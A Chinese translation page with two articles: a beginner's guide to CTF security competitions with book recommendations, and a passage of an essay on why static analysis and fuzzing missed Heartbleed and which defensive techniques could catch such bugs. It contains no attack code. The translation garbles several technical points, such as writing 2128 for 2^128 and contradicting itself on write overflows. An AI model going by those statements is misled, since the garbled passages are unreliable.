原文：http://www.endgame.com/blog/how-to-get-started-in-ctf.html

翻译：赵阳

在过去的两个星期里，我已经在DEFCON 22 CTF里检测出了两个不同的问题：“shitsco”和“nonameyet”。感谢所有的意见和评论，我遇到的最常见的问题是：“我怎么才能在CTFs里开始？”在不久前我问过自己一样的问题，所以我想要给出些对你追求CTFs的建议和资源。最简单的方法就是注册一个介绍CTF的帐号，如CSAW, Pico CTF, Microcorruption或是其他的。通过实践、耐心和奉献精神，你的技能会随着时间而提高。

如果你对CTF竞争环境之外的问题有兴趣，这里有一些CTF比赛问题的集锦。挑战往往也是有多种不同的难度级别，注意解决最简单的问题。难易程度是根据你的个人技能的程度决定的，如果你的长处是取证，但是你对加密不在行，取证问题将会成为得分点而相比之下加密问题就会拖后腿。CTF组织者对此有同样的感知，这是为什么对于CTF比赛的评价是很大的挑战性。

如果你已经亲自尝试过几个基础问题且仍然苦恼，现在有很多自学的机会！CTF比赛主要表现以下几个技能上：逆向工程、密码学、ACM编程、web漏洞、二进制练习、网络和取证。可以从中选择并关注一个你已经上手的技能方向。

1、逆向工程。我强烈建议你得到一个IDA Pro的副本，这有免费版和学生认证书。尝试下crack me的问题。写出你的C语言代码，然后进行反编译。重复这个过程，同时更改编译器的选项和程序逻辑。在编译的二进制文件中“if”声明和“select”语句有什么不同？我建议你专注于一个单一的原始架构：x86、x86_64或是ARM。在处理器手册中查找你要找的，参考有：

《Practical Reverse Engineering》

《Reversing: Secrets of Reverse Engineering》

《The IDA Pro Book》

2、加密。虽然这不是我自己的强项，但这里有一些参考还是要看看的：

《Applied Cryptography》

《Practical Cryptography》

Cryptography I

3、ACM编程。选择一个高层次的语言，我推荐使用Python或Ruby。对于Python而言，阅读下《Dive into Python》和找一些你要加入的项目。值得一提的是Metasploit是用Ruby编写的。关于算法和数据结构的计算机科学课也要在此类中要走很长的路。看看来自CTF和其他编程的挑战，战胜他们。专注于创建一个解决方法而不是最快或是最好的方法，特别是在你刚刚开始的时候。

4、web漏洞。有很多的网络编程技术，在CTF中最流行的就是PHP和SQL。php.net网站（译者注：需翻墙）是一个梦幻的语言参考，只要搜索你好奇的功能。PHP之后，看到网页上存在的挑战的最常见的方法就是使用Python或Ruby脚本。主要到技术有重叠，这有一本关于网络安全漏洞的好书，是《黑客攻防技术宝典：Web实战篇》。除此之外，在学习了一些基本技术之后，你可能也想通过比较流行的免费软件工具来取得一些经验。这些在CTF竞争中也可能会偶尔用到，这些加密会和你凭经验得到的加密重叠。

5、二进制练习。这是我个人的爱好，我建议你在进入二进制练习前要完成逆向工程的学习。这有几个你可以独立学习的常见类型漏洞：栈溢出，堆溢出，对于初学者的格式字符串漏洞。很多是通过练习思维来辨别漏洞的类型。学习以往的漏洞是进入二进制门槛的最好途径。推荐你可以阅读：

《黑客：漏洞发掘的艺术》

《黑客攻防技术宝典：系统实战篇》

《The Art of Software Security Assessment》

6、取证/网络。大多数的CTF团队往往有“一个”负责取证的人。我不是那种人，但是我建议你学习如何使用010 hex editor，不要怕做出荒谬、疯狂、随机的猜测这些问题运行的结果是怎样。

最后，Dan Guido和公司最近推出了CTF领域指南，会对以上几个主题的介绍有很好的帮助。

（全文完）

原文：How to Prevent the next Heartbleed.docx

翻译：赵阳

一、引言

基于OpenSSL的心脏出血漏洞被认为是CVE-2014-0160的严重问题，OpenSSL被广泛的应用于SSL和TLS插件上。本文用对心脏出血漏洞的解释来说明这个漏洞是怎么被利用的。

本文中研究了抗心脏出血漏洞及其相似漏洞的专用工具和技术。我首先通过简单的测试来分析为什么很多的工具和技术不能发现这些漏洞，这样可以使我们更能了解到为什么之前的技术不能发现这些漏洞。我还要概括总结要点来减少这些的问题。本文不介绍如何编写安全软件，你可以从我的书《Secure Programming for Linux and Unix HOWTO》或是其他的著作中学习到这点，本文中认为您能开发软件。

我的目的是为了帮助防止类似漏洞的出现，从而提高安全软件的开发能力。正如Orson Scott Card’s Ender’s Game中的虚幻人物Mazer Rackham所说的“这里没有老师，只有敌人…只有在敌人那里你才能了解到自己的弱点。”让我们来了解这些漏洞，然后可以避免相似的漏洞再次出现。

二、为什么这个漏洞不能更早的被发现？

这个OpenSSL漏洞是由一个很熟悉的问题引起的，这个关键的问题就是缓冲区读溢出，由于不正确的输入导致。这些都是很常见的问题，很多的工具是专门用来查找这方面的问题，会使用很多工具对OpenSSL进行定期检查。

Kupsch和Miller专门查找了心脏出血漏洞，在这个漏洞被发现之前，使用了很多的方法也没有发现这个漏洞，虽然很多人和工具都用来查找类似的漏洞。他们进一步认识到“心脏出血漏洞对当前的辅助软件提出了重大的挑战，而且我们不知道是否有工具能在这个漏洞被发现之前被使用。”我会强调一些其它的问题和我自己的一些观点。

2.1 静态分析

在没有执行这个程序时的静态分析。

最常用来寻找漏洞的静态分析工具是source code weakness analyzers，source code security analyzers, static application security testing，static analysis code scanners 和 code weakness analysis tools。每个源代码分析工具是通过使用类型匹配的方法来寻找漏洞的。有很多的报告可以评估这些工具。

然而，在之前的时间里使用静态分析工具没有发现这个漏洞：

1、Coverity：Coverity没能在心脏出血漏洞公布之前发现这个漏洞。他们正在通过努力来提高他们的工具的质量，从而在将来能够发现相似的漏洞，使用了一些有趣的新启发方法。

2、HP/Fortify: HP/Fortify已经公布了一些心脏出血漏洞的描述，但是我没有任何的证明能说明他们的静态分析工具在漏洞公布前就发现了这个漏洞，在漏洞被公布后，他们确实是更改了他们的动态测试软件包，但是和之前的不同。在专门讨论这个问题时，他们没有证据让我相信他们的工具真的在心脏出血漏洞被公布之前就发现了这个漏洞。

3、Klocwork: Klocwork在正常的配置下没有能够侦测到这个漏洞。

4、Grammatech: Grammatech 的CodeSonar同样没有侦测到这个漏洞。他们也是通过实验来提升能力，以便在以后能够发现相似的漏洞。

最主要的争议就是这些工具都不能保证能够发现所有的漏洞，甚至不能保证发现特定类型的漏洞。很糟糕的是这些术语很混乱，所以我们首先要搞清这些术语的意思。

本文中在分析软件时，使用的工具不能找到所有的漏洞，但是我找到了这个分析软件的不足。在以前的文章中，很多人使用unsound来描述那些不能找到所有漏洞的来查找漏洞的工具。例如Bessey等人在分析Coverity的静态分析工具，并且说：“像PREfix产品，我们也使用unsound。”我们的产品并没有证明说这是没有错误的，而是尽我们的能力来发现这些问题。这项研究工作中存在很大的争议，虽然它几乎已经成为商业软件和研究项目的实际工具基础。一个unsound术语会导致混乱，因为人们使用program checkers，它使用术语unsound来代替不同的意思。在一个博客上解释了为什么相同术语会有两种相互矛盾意思。“大多数的program checkers来证明定律的程序。特别情况下，主要的目的是在某个方面来证明程序的正确性。一个定律的证明是来证明这个定律的正确与否…人民在程序检查过程中习惯了使用这种做法，所以他们没有考虑bug的存在。但是一个bug的发现者不是要证明这个程序是不对的，而是用来证明有bug存在，使得他们报告了发现的bugs，它们就都变成了真正的bug，如果没有错误，将会忽略bug，因为他们不能证明是否正确。”

本文中我使用了NIST SAMATE SATE V Ockham Sound Analysis标准来消除混乱，在NIST SAMATE用语中，工具是不能发现所有漏洞的，从而证明程序是不完备的。下面来说明NIST是怎么区分程序的可靠性和完整性：“一个网站的代码可能会出问题，一个有bug的网站会有一系列问题，这就是说一些输入会导致问题。一个没有bug的网站不会出现一些列问题，就是说它是安全的或是没有漏洞的…这些可以从一个网站的报告中得知。或者说，一个网站有特殊的问题或是一个网站没有问题…可靠就意味着每一个发现都是正确的。没有必要使用工具产生每个网站的报告；这是完整的。”

为什么那么多的源代码分析工具是不完整的？首先，大多数的程序语言不是很容易能被分析的。其次，大多数的软件使用静态分析工具来分析也是很不简单的。最后，完整的分析工具要求更多的人来应用在程序上。相反，不完整的分析工具能够立刻应用到程序上。他们成功的使用启发的方法来鉴定漏洞和在有限的时间里来完善分析。但是，这里会有重要的警告：不完整的代码分析工具常常会漏掉漏洞。

心脏出血漏洞是一个鲜明的使用不完全的启发方法不能发现的重要漏洞的例子，不能发现这个重要漏洞的最主要原因就是OpenSSL代码很复杂；多个层次的间接寻址和超出了工具的分析能力，从而不能发现漏洞。局限性和深层次存在的原因是C, C++和Objective-C都很难使用静态分析；像指针更难使用静态管理。这并不是意味着静态分析工具就是没用的，静态分析工具能够测试软件在大量的输入后的表现，工具的启发原理会限制错误报告的出现次数。但是更重要的是不完整的静态分析工具使用了启发原理后，在分析大的漏洞时会出现错误。

2.2 动态分析

动态方法就是使用特定的输入来运行一个程序并试着发现漏洞。

动态分析局限性是它不能使用时间表来测试任何程序。如在一个琐碎的程序中加入了64bit的整数，会有2128种可能的输入，测试这些输入就要使用13.5十万亿亿年的时间。甚至大规模的并行计算也不能解决这个问题。现实中的程序要比这复杂的多，因此动态方法不能体现一个程序的安全性；他们只能显示在测试中存在漏洞。

但是这并是意味着动态方法就是没有用的。动态方法在提升安全性上是很有用的，但是要了解到他们的局限。

让我们来分析我们广泛使用的两种方法，但是不能发现心脏出血漏洞： mostly-positive测试和fuzzers。

2.2.1 mostly-positive自动测试套件

一个方法是开发一个强大的自动化测试套件。Eric S. Raymond和一些其他人在研究心脏出血漏洞时，他的表述为：“我认为很多人都认为这个测试套件不能很好的工作…我以前学到了尽量去推进传统方法来完成你不能达到的程度。”我同意他的观点，一个好的自动化测试套件是很强大的，特别是应用于非安全性缺陷时。如果你没有或是开发一个，就完全的停止，我们表示同意。

但是，测试套件能否发现心脏出血漏洞要依靠你是怎么开发的这个套件。很多的开发人员都开发了测试套件，这个套件主要是我说的“mostly-positive”测试套件，它可能不能发现心脏出血漏洞。后面我将会讨论negative测试，这种测试方法可能会有作用，但是我们要知道为什么一般的测试方法不能做到。

很多的开发者和组织者专门测试了正确的输入时会发生什么。当你这样思考时就更有意义；一般的使用者都会抱怨在正确的输入时是否会没有正确的输出，并且大多数的使用者不会测试在不正确的输入时程序会有什么结果。如果你的目的是很快的分辨出问题，在大多数的情况下，在正确的输入时人们会努力控制能够预测的错误条件。很多的开发人员不能思考到当入侵者发送精心设计的输入来利用程序时会发生什么。

我会使用mostly-positive测试套件的方法来测试在正确的输入时会发生什么。不幸运的是，在很大程度上，今天的软件入侵测试套件都是mostly-positive。都在关注开发mostly-positive测试套件的测试。

1、Test-driven development(TTD)是一个软件开发过程，“开发者写了一个自动测试工具来提升和增加新的功能，之后使用最少数量的代码来通过测试，和最终生成新的代码的接受标准。”通常情况下这些测试是用描述一个新功能要做什么，而不是他们不能做什么。

2、当很多的标准链接在一起，交互式测试就会决定他们是否能够链接和分享数据。交互式测试能够很好的帮助开发者来提高一个协议标准。但是其他的实施方法也能遵守这个规则，其他的实施方法不能够完成“什么不发生”的测试。

mostly-positive测试实际上对于安全软件来说是没有用的。mostly-positive测试一般不能测试正确的事物。对于心脏出血攻击和其他的攻击，攻击者发送数据用不是平时用的格式。TTD和交互式测试都是好工具...但是你需要加强他们来改善安全软件。

代码覆盖工具对漏洞的发现没有任何的帮助。一个开发者可能会运行代码覆盖工具来看下哪些程序没有被测试，之后增加测试来达到大部分的代码被测试。当测试套件测试了80%-90%的代码时，很多人会很高兴；一般很少会达到100%的覆盖。测试覆盖工具有某种安全价值，例如，他们有时能够侦测到等待出发者的恶意软件，他们也能够核查是否有特别的程序能够正确的运行。但是使用典型的代码覆盖工具测试到100%的覆盖，不能对抗心脏出血漏洞。心脏出血漏洞缺少恰当的输入验证。基本上，一个代码覆盖工具不能注意到丢失的代码；只能注意到没有测试的代码。

我要说在OpenSSL里也不会有例外出现，又如在苹果的iOS设备上运行SSL/TLS得到了错误的结果时，也能通过mostly-positive来证实它的测试。在这个漏洞中，SSL/TLS库接受了有效的证明。然而，没有人验证这个库能拒绝某些无用的验证。如果你只是测试是否有效的数据会产生有效的结果，你就不能发现安全漏洞，因为大多数的攻击都是在基于程序没有准备好的时候输入。

如果你开发的套件能使用我在下面描述的方法，你能够通过一个好的测试套件来发现这个漏洞。首先，让我们来研究fuzzing。

2.2.2 Fuzzers 和fuzz测试

Fuzz测试是一个随机输入，之后发送到程序测试去看是否出现不渴望的过程。进行fuzz测试的软件叫Fuzzers。

Fuzz测试同传统的测试不同，在传统的测试过程中，你会有一个给定的输入组，并且你知道每个输入对应的输出情况。传统测试会随着测试数据的增加而变得更复杂，因为你要预测渴望的输出结果。决定输出想要的输出结果是一个Oracle机制。使用一个Oracle的数据作为输入的问题被叫做Oracle problem。

Fuzz测试处理不同的Oracle problem，因为它只是在试图侦探能使程序崩溃的问题。这就是使它在Fuzz测试中输入更多的测试数据，即使输出测试更不准确。Fuzzing测试方法是1988年Barton Miller在University of Wisconsin开发的。在http://pages.cs.wisc.edu/~bart/fuzz/上有更多的有关fuzz测试的信息。

Fuzzers经常用来发现安全漏洞，因为他们能够测试大量不可想象的输入。特别是，Fuzzers常用来发现输入验证的问题，心脏出血漏洞就是在输入验证错误的基础上产生的。但是典型的Fuzzers不能发现心脏出血漏洞，因为：

1、心脏出血漏洞是由于缓冲区读入溢出，而不是缓冲区写入溢出的漏洞。大多数的Fuzzers只是发送大量的数据和寻找程序的崩溃。但是，当缓冲区写入溢出常常会导致崩溃，缓冲区写入溢出在正常的环境里是不会崩溃的。在Fuzzing过程中，甚至会使用一些对策来解决写入溢出，而不是读入溢出，如canary-based保护方法和非执行堆栈。可靠性不是很大的问题，因为存在方法是出入溢出导致崩溃，或使用其他的测试工具来测试…这会给我们带来第二个问题。

2、OpenSSL包括它的内存分配路径，并且除非使用特别的调试方法，不然我们会经常使用他们。更糟糕的是这些特别的方法不能正常工作。特别是，OpenSSL使用它自身的应用程序管理缓存来提高性能时，而不是简单的依靠内存管理路径。这种应用程序管理缓存可以阻止许多典型的缓存例程，包括测试工具如electric fence、valgrind和address sanitizer。这就意味着使用fuzz测试来测试缓存的路径问题时，测试会忽略一些特殊的情况。

因为加密技术能在很大程度上减少fuzz测试的无效性，除非fuzzer有密码和专门用来袭击的密码库。有一些fuzzing不能在OpenSSL和一些密码库下严格执行的推测应该是正确的，然而，没有什么能阻止密码被fuzzers获取。除此之外，心脏出血漏洞甚至在没有密码的情况下被发现。因此，就是在读出溢出和OpenSSL使用自身的内存缓存分配路径的联合使用时，使fuzzing变的无效。

三、用什么来对抗类似心脏出血的漏洞？

这里有部分在先前可以对抗心脏出血漏洞的软件和工具，我会特别的介绍一些好用并且免费的自由开源、源代码软件。

首先是一些说明：

不要只用一种工具或一种技术来开发安全软件。开发安全软件要集合很多的方法，最开始要知道怎么开发安全软件。大多数的组织最初是使用简洁清晰的方法来开发安全软件，启用和注意编辑器的警告标志，使用源代码弱点分析工具，让多人进行研究，运行fuzzers，使用大量的自动入侵工具套件。如果你只是使用一种技术，你只能对抗上一次攻击而不是这次。例如，会大量的忽略掉警告标志，即使是警告标志不能发现心脏出血。那就是说，当攻击成功时，最重要的是怎么完善软件，攻击者可能如使用一样的方法来入侵软件。更好的改进也能对抗其他的攻击。

这不存在一种类型的工具和技术的列表，不同的工具有不同的用途。可以在[BAH2009] [NIST]上了解更多关于各个类型的工具和技术。我创建了这个特别的列表，但是我要尽量清楚我的意思。

先前没有一个明确和完整的用来发现心脏出血漏洞的工具和技术的列表，我很想做一个，我希望得到更好的建议。

以上是一些说明，先前是什么在对抗这个漏洞的，为了完成这个，我已经大致的完成了这个列表，用最简单的方式介绍他们。这是最粗略的，会有一些问题；欢迎来改进。使用更多的方法来对抗其他类似漏洞，不只是心脏出血。使用动态和静态分析法来识别在括号里的副标题。

3.1 使用negative测试（动态分析）

negative测试会得到错误的结果。例如，对于一个设置了密码的系统来说，在知道有效的用户名和密码时，要通过很多次的回归测试才能登录成果。negative测试会显示很多无用的用户名和密码，其他的无效的输入会阻止用户登录。

通过negative测试方法创建了一系列的使用错误输入的测试。我指的是每个类型的输入，因为不能测试每一个输入，在动态测试中能得到解释。在回归测试工件中要包含无效数值来测试每一个输入，每个状态/协议转换，每个使用说明书等等。这就会立刻发现心脏出血漏洞，因为心脏出血漏洞包含一个不正确数据的长数值。这也会发现其他类似CVE-2014-1266的错误，如在苹果iOS上使用SSL/TLS会得到的错误。在CVE-2014-1266中，iOS存在接受无效认证的问题。很多的测试中存在有效的认证…但是，没有足够的测试来测试无效的认证。

在大多数情况下只有negative测试对安全还有点用途，之前，我注意到重要的是如何创建测试套件。对于阅读本文来说是明显的，特别是，当我怀疑Eric S. Raymond在讨论测试的优势时使用这些类型的测试。但是这对于软件的开发者来说是明显的，大多数的开发者和组织者都是在使用mostly-positive test套件。很多的开发者很难像攻击者一样的思考，只是错误的通过广泛的测试不可能发现的原因。

通过negative测试的就是起初的半自动的过程，您可以开发出可以执行计算机可处理的规范，并生成大量测试结果的工具…之后看看是否可以控制它。

另一个使用negative测试的重要条件就是是否有一个标准，可能合作开发一个独立的普通测试工件作为FLOSS项目。之后可以通过快速测试所有当前和以后要执行的方法，并且阻止使用者遇到问题。我强烈的推荐使用SSL/TLS协议开发一般目的测试工件；不然会减少效果，这会增加应用的安全性。单独的应用也需要使用附加测试来补充单一测试，但是一般的大测试套件是很有用的。

软件测试是一个完整的领域。存在着不同类型的测试方法和测试范围标准。我只能在本文中总结测试。更一般的信息可以看下Paul Ammann and Jeff Offutt 的Introduction to Software Testing。但是要理解这个：只用使用有效的输入来测试来发现这多的问题，如心脏出血漏洞。

我不知道在整个negative测试中依靠什么，或是其他什么单独的技术，对于安全来说。动态的方法很自然，在真实输入空间只能测试一个微不足道的部分。但是这种方法很容易发现安全漏洞。

3.2 地址核对和标准内存分配在fuzzing

不幸运的是一般的fuzz测试方法在这种情况下是不能很好使用，但是我们可以学习简单的过程。如果可以使fuzzing对一系列的地址进行有效果的、容易的核对和使用。这种类型的工具能侦测到在执行过程中读溢出和加写溢出，并且常常发现其他的存储问题。

许多的工具能够完成对地址的核对；每一种工具都有两面性。但是，如果你没有使用其他的什么工具，我强烈的建议你尝试下address sanitizer。

address sanitizer简单有效；它只是一个在LLVM/clang和gcc中建立的附加的标志。address sanitizer没有什么神奇的；它只是擅长侦测缓冲区的读写溢出问题，释放后使用或是双重释放。它也能侦测到use-after-return和存储泄漏。它不能发现所有的存储问题，但是这是一个很好的工具。它的表现超出平均的73%，使用2x-4x的存储。这种表现一般和测试环境是无关，在侦测这些问题时它很少被提到，在测试过程中Chromium和Firefox网页浏览器都使用的address sanitizer。要了解更多可以去看USENIX 2012或是address sanitizer网页。

还有其他的工具能够侦测内存的使用和分配地址的问题。很多人使用guard pages来检测读和写在缓存。Valgrind被广泛使用和广受欢迎；valgrind在检测内存时能发现很多的问题包括在堆栈中读溢出。另一个广泛使用的工具是electric fence。在运行不同的fuzzer时可以使用不同的工具。

一般情况下，使用fuzz测试时你必须打开你能打开的所有的探测设备。第一个fuzzer侦测时使用这种机制“没有改变的程序崩溃或是死掉？”并且很多的fuzzer还只能做这个。你必须要加强程序的访问，并且要开发尽可能多的访问。你可以增加额外的核对来确保中间和最终程序语句的正确。要不是心脏出血漏洞的出现，你至少应该打开无效的内存访问探测器，如address sanitizer。

许多的工具包括address sanitizer和基于程序的guard page，要求这些程序具有测试正常分配和释放内存的能力。特别是，程序没有必要使用符合分派准测的机制。至少，这个程序应该可以轻松地使用正常分配方法用于fuzz测试。

一个相对的方法是concolic测试，CREST就是一个基于C的concolic测试的自动测试过程工具。但是CREST目前只能用于象征性为线性整数的运算，所以它能在这种情况下工作。更一般的是现在的concolic测试工具不可能发现心脏出血漏洞。如果哪个人说他确认concolic测试发现了心脏出血漏洞，请让我知道。

大家一直都在为fuzzers是否比negative测试复杂而争论不休，但是这只是我的推理。negative测试的一个优点是它很容易入手；假设你已经有了一个测试套件，你就可以开始negative测试。更重要的是negative测试能快速给出一个模糊导致问题的答案，他们要求计算能力很少的开发者使用每一种方法来获得重复测试套件。相反，fuzz测试要求更好的计算能力和对结果的解释；计算能力不算什么，这会影响到对开发者的反馈速度。一个潜在的更快negative测试的反馈能够是开发者更快的实现检测和修复；今天最大的问题就是开发者的时间，而不是计算时间；一个最好的机制能减少开发过程的复杂度。你也可以在某个特定的协议下，使用negative测试套件；你能够在每个测试设备和实施方法中轻松的重新使用测试套件。当然，这不存在什么冲突；最好使用fuzz测试和negative测试两种方法。

3.3 编辑内存分配标准和使用address guard或是sanitizer

如果在对抗来自潜在的漏洞攻击，在未知的环境里你现在就要使用一个程序怎么办呢？

一个方法就是使用侦测在分配的内存的最后区域来实现读的机制，但是使用这种方法你不能改变测试怎么运行；这个观点就是你实际上用的在一个分配要求下的多重分配机制。

存在运行时间侦测漏洞的多种机制；这就是一些例子：

1、Address sanitizer。你要重复调试一个程序时可以使用它。在LLVM/clang和gcc编辑器上Address sanitizer就是一个标志，这相对与C程序的软件简单的多，这占了平均运行的73%，和2x-4x的存储。这不是你想只能手机上做的，很多繁忙的网站不欢迎这些。现在的计算机比过去的有更好的能力和存储，一些环境中就会被接受…这就是你能够立刻对抗未知攻击的可能性。Address sanitizer在侦测一长系列潜在问题上很有作用，包括大量无效的缓冲区访问。Address sanitize不是在所有的编辑器里都无效；这要在其他的如C, C++, 和Objective-C编辑器中来添加它。

2、Intel Memory Protection Extensions。MPX新增了叫边界寄存器的寄存器来控制指针的边界，使用新的指令来运行和使用边界。MPX使用Skylake架构，但是在2014年这些CPU不能和公众见面。这要更长的时间被广泛的得到使用，那不能组成non-Intel系统。

3、内存分配保护页面。一些系统内存分配能够在分配一个用来组织读和写的内存后，添加一个未定的保护页面。这些能否会禁止和阻止心脏出血漏洞，这些取决于它是如何实施的。OpenBSD的malloc的实施支持保护界面。在OpenBSD中，G选项会导致“使用保护页面后的每个页面分配到的数据大小过大，这些会导致访问错误。”这会与P选项进行组合来移动一个页面内的分配。OpenBSD机制可以启动特定的程序，甚至是特定的默认情况下，在整个系统中启动，这样就可以在更多的环境下得到保护。OpenBSD的malloc机制有一个弱点：即使开启G和P两个启动项，少量的分配不会立刻完成保护页面。如果OpenBSD的保护界面机制能够在较少量的分配后立刻插入一个保护页面，我认为会更好，即使这可能会对速度和内存大小有很大的影响。但是即使是这样，开启G和P就意味着所有大于半页的分配会立刻跟随一个保护页面，并且分配一个半页或是更少将会泄漏半页。这就会明显的减少泄漏规模，相比于原来心脏出血漏洞攻击时泄露的64K。内存分配必须要对齐，所以保护页面可能泄漏一些字节的信息，这就取决于如何实施的。我怀疑Address sanitizer要比增加保护页面的分配快，但是添加保护页面不要求更多的程序来进行重新编译，这就是它的优势。不幸运的是GUN的libc中malloc不能有附加的这些功能。

当然，这种方法假设你有一个能启动（1）的内存保护机制和（2）内存保护机制也会在这种机制下工作。很多的机制可以对抗缓存写溢出，不是缓存读溢出，心脏出血漏洞就利用了读溢出。例如：GUN的libc中的malloc（）可以选择MALLOC_CHECK_。这就是防止写溢出的方法，但是我不认为它能对抗类似心脏出血的读溢出。同样，Dmalloc’s fence-post检测“在程序从这个区域中读取时不能注意到，只有在写入时才会有通知。”我觉得GUN的libc和一些类似的运行过程中也要增加类似OpenBSD的malloc的保护页面机制，从而对抗读溢出。

这是一个可以减少伤害的方法，而不是一个消除个问题的办法。从安全的角度来看这种方法把缺少保密变成了缺少实用。然而在很多的情况下这是一个很好的协议。一旦受到攻击，这个方法就会使问题变成可视化的，一旦问题可视化后就变的很好改正了。

这个方法很容易和honeypot或honeynet联系在一起。在honeypot或honeynet系统上设置这些硬化的方法。如果攻击者试图破坏软件，这个软件不会崩溃，并且会记录下攻击者的重要日志和追踪记录。Forensics就会侦测到一些专门利用一日0攻击。我认为通过一些日志记录结合入侵侦测系统来进行追踪；在硬化密码库中发生了崩溃，就会特意的记录下。这就会使普遍的侦测利用一日0攻击更加的容易。分布核心基础设施组织和在互联网上其他组织都可以建立这些类保护我们。

虽然这种方法并不能完全解决这个问题，但是他能提供一个有力的缓解功能。一些发行者或组织可能需要在特定情况下使用这些措施，或至少使这些措施变得更容易。

修改代码不会很复杂，并且重新编译也是很简单的。不过，在很多的设备上性能的欠佳都体现的很显著，可能是你失去了硬件后的性能。特别是在使用Address sanitizer时，你会失去一半的速度。因此，我指望使用这种复杂的解决方法，就要考虑到硬件的消耗。在很多的情况下，会影响到运行，在智能手机上就会降低运行速度和电池的寿命，对于当前流行的服务器的话，也会减慢反应速度和增加电量的消耗。如果将来的CPU能支持Address sanitizer，对速度的影响就会显著的降低了。我希望CPU制造商能考虑下这点。

3.4 关注各个领域的手动检测验证

漏洞的代码是人为审查的，显然只有一个人来审查是不行的。

然而，大量的工作就要有专门的人来检查每个领域，为确保得到有效的验证，有时会在计算机安全中得到一个不好的名字。我怀疑的原因之一就是有时候，那些部署清单的人在做什么，之后也不能很好的利用它。但是出色的飞行员经常使用仪表盘，他们知道是做什么的。如果补丁是他们使用清单上工具后的唯一成果，“必须证明每一个不可信的数据字段进行验证，”之后这个漏洞被反击。

列入人为检查/审计的一部分，和一些简单的方法不同。然而，这确实要就检测人能了解所有的补丁，它不能依靠以前的代码来得到帮助。

3.5 对文件包括注解系统的配置源代码的弱点分析

传统的源代码弱点分析是找不到心脏出血漏洞，因为他们使用的是通用的启发式方法，代码复杂，在这种情况下不能很好的起到作用。它总是你能看到的最简洁的代码，但是基于你要完成的任务总是会有一些复杂性，真实情况下人类是不能达到完美的简约。Coverity公司正在开发一些新的，他们认为能够检测到心脏出血漏洞的启发方法…并且对他们是有好处的。至少有一个人已经使用了类似的启发方式。事实上，我希望所有的代码分析工具都能得到改善，从而发现他们以前不能发现的漏洞。但通用的启发方式在某个特定的时间点只能达到这个程度，你能做的更好吗？

回答是肯定的，它叫做为上下文配置的源代码弱点分析工具。基本思想是，你开始使用一个恶源代码弱点分析工具，之后你在提供更多的你要分析的程序的信息。这种方法比仅仅运行源代码弱点分析工具需要更多的时间，而这些额外的信息通常要和一个特定的工具联系在一起。然而，提供你需要的程序的信息，源代码弱点分析工具可以能更好的工作。

Klocwork已经表示这种方法对心脏出血漏洞是很有效的。

现在让我们来谈谈注释系统。在很多的地方来为静态分析工具提供这种额外的信息。一个常用的方法就是对程序添加额外的注释机制，在修改程序时会使用他们。这些注解可能在更改的代码中进行添加，添加在注释中，或是加在单独的文件里。使用C的工具或是注解包括Microsoft’s SAL、splint、Deputy、Oink/CQual++、cqual、和Frama-C ANSI/ISO C。你可以很容易得出添加这些信息确实是一个不同的技术。

认真的使用这些额外的注解来对抗漏洞就要有很大的工作量，如果从现存的代码来说。对于C来说存在许多不同的不兼容的注释系统。对于他们来说是没有什么标准的，这会进一步的阻碍他们的使用。毕竟，它需要添加注释和这些注释会把你锁到一个特定的工具中；Microsoft SAL会有更多的问题，没有FLOSS的应用和这只能在Windows上使用。我认为如果针对每个主要的编程语言包括C在内，任何一种单一被广泛接受的标准注释符号，注释系统将会更加广泛的应用。当没有这么个符号时，像C语言等语言就会很难得到那样一个协议。Peter Gutmann已经写了一些他的经历。

但是，注解系统是由一些好处的，注解系统能够发现简单的漏洞，不用在转变成不同的语言。他们也很少去转变成不同的语言，当然，这并不冲突；你可以切换语言，使用一种新的语言在注释系统中。

3.6 实现100%的分支覆盖率

或许有另一种方法可以发现心脏出血漏洞，实现100%的分支覆盖率。如前面所述，在一个缺失特定程序的中输入有效的验证码时，分支测试是不检测到的。但是分支覆盖可以在不同的实现方法中检测未经验证的分支程序。努力实现一个测试套件，让多个实现全覆盖分支大大增加了丢失了验证码和遗漏了异常处理时被检测到的可能性。更强的测试覆盖措施也会工作的很好，如修改条件/判定语句。

这个测试套件必须要包含多个应用，实现100%的分支覆盖。更重要的是，有不同的实现方式，效果更好。最终，用一个特别的方法来发现漏洞。此外，这种方法比其他的方法更难发现安全漏洞。可能是因为在相同的路径下输入不同的数值，但是只有小部分可以引起问题。如果在测试中其他的一种方法实施了特定的组件和实现了潜在的缺失验证码的代码，它也只能有作用。我从来没有在其他的文献中见过这个特定的方法；人们通常讨论一个执行分支的覆盖。不过，会注意到这种方法不仅可以提高能力，也能发现特殊的漏洞。

实现100%的分支覆盖率比彻底的negative测试更加复杂，这是因为如果你有个很差的测试套件，它会花费大量的时间来从一个错误的分支转向，来弄清楚怎么激发它。错过的分支往往是很难触发的在特定错误的处理系统中，或是对无法验证“不会发生”的分支作防御性设计。此外，这个套件变得更强大能够实现100%的覆盖；很多的组织不能尝试增加一个单一的方法来使分支覆盖到100%，不关心100%的分支覆盖。

这就存在一个问题：这不能很好的反击心脏出血漏洞，因为在很大程度上取决于所有的配置扩展或是注解以及怎么使用。在另一方面，它们不取决于完全冲击的正确输入；静态分析工具可以同时检测大量的问题。

3.7 攻击运行认定

软件开发人员积极的插入和开启运行认定。有人猜测这是对心脏出血的反击，所以我将在这里研究下这中可能性。

软件开发人员可以断言各种价值关系和状态必须是正确的。这些断言可以在运行时停留。几乎所有的语言都会有一种内置的判断机制，有些语言会有一些内置的先进机制的前置条件，后置条件和不变量。在某些情况下，这些语言可以优化一些判句，会留下一些在优化过程中不能优化的问题，一个注解系统可以用静态来实现，一部分可以用动态实现；我先前对注释系统的静态应用的评论。

暂时增强系统逻辑断言是一个更为先进的使用暂时断句的研究方法。你可以在http://www.cl.cam. ac.uk/research/security/ctsrd/tesla/.网站上发现更多的信息。

不用怀疑断句可以有一个极好的机制来用于检测无效状态，无效状态有时是一个最弱的指标。

然而，这中方法在涉及到对抗心脏出血漏洞时确实有些不足。不论是原开发商或是检查的人意识到检查请求报文的长度值是很重要的；因为没有使用长度检查，开发者是不能添加判据来检查它。这是一个在进行negative测试时的问题，但是negative测试可以通过分割这些要开放的功能的代码来简单的实现，很容易证明所有的数据字段都在进行检查，所以我感觉negative测试会更有可能发现存在漏洞的类型。因此，虽然积极的注释可以很有效的对抗漏洞，在某种程度上它会在特定的情况下工作。

我把这种方法看作是一个较为复杂的选择。使用这种方法可以检测到心脏出血漏洞，需要积极使用判据。增加这些判据要使用大量的开发时间和提高运行的成本。

3.8 更安全的语言

